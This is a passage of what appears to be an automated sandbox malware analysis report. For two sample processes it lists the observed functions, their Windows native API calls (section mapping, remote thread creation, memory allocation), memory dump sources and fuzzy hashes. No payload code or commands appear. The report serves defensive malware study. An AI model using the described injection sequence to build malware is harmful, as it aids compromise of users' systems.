NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 0286F737 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0286F75F
Module32First.KERNEL32(00000000,00000224), ref: 0286F77F

Memory Dump Source

Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 91ff210559ac45af43517c22d32616b0c191c9ff8dd05f2d02ffa2d4f7b02a63
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0DF0903E201711ABD7203BF9BC8CB7E76E8EF59624F140629E757D18C0DB74E8468A61

Function 025F003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025F024D

Strings

kernel32.dll, xrefs: 025F008F, 025F0095
cess, xrefs: 025F018D

Memory Dump Source

Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 2bc16f8fc9d674a359e82255396bfaf4460c3dcf40cbb1e3c6c00cf5a97d9ab5
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 1D525B74A01229DFDBA4CF58C984BA8BBB1BF09314F1480D9E54DAB356DB30AE85DF14

Function 025F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025F0223,?,?), ref: 025F0E19
SetErrorMode.KERNELBASE(00000000,?,?,025F0223,?,?), ref: 025F0E1E

Memory Dump Source

Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 628376f22f89637915a514a29e8cea632e2d58ee58e53dd2b420f71a9b81e576
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: F2D01231545128B7D7402A94DC09BCD7F1CDF05B66F048011FB0DD9081C770954046E9

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 0286F3F6 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0286F447

Memory Dump Source

Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 30a384aae7e751b7d7160bf8202613de5e14337de4c7e4d5329d54ac5db72248
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 75113C79A00208EFDB01DF98C989E98BBF5AF08350F05C094FA489B761D371EA50DF80

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Non-executed Functions

Function 025F092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 025F09DC, 025F09DF, 025F09E4
., xrefs: 025F095F
l, xrefs: 025F0966

Memory Dump Source

Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: e0b32d2eb9f53ff4276b663d4ecf1421a7dbf0d1f7a39fd612ab1229708f77a5
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 74318CB6900609CFDB10CF99C980AAEBBF5FF48324F58404AD941A7355D771EA45CFA8

Function 0286F014 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 46588f749df605b498f0d446648f402aa01048a8cbedcf00251f59e469ccd354
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 1411A07A340100AFDB00DF59EC84FB273EAEBA8320B198055EA09CB705E775E801C761

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 025F0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: f410919c348453e9a810b2dd9e0dd2eb818f0842cd60fb27fb0a5509632708a4
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: D201F7736116008FDF61CF20C804BAB33E5FB85206F0940A4DB06D72CAE370A8418B84

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Analysis Process: sfjujsrPID: 2128, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	42.6%
Signature Coverage:	0%
Total number of Nodes:	122
Total number of Limit Nodes:	4

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
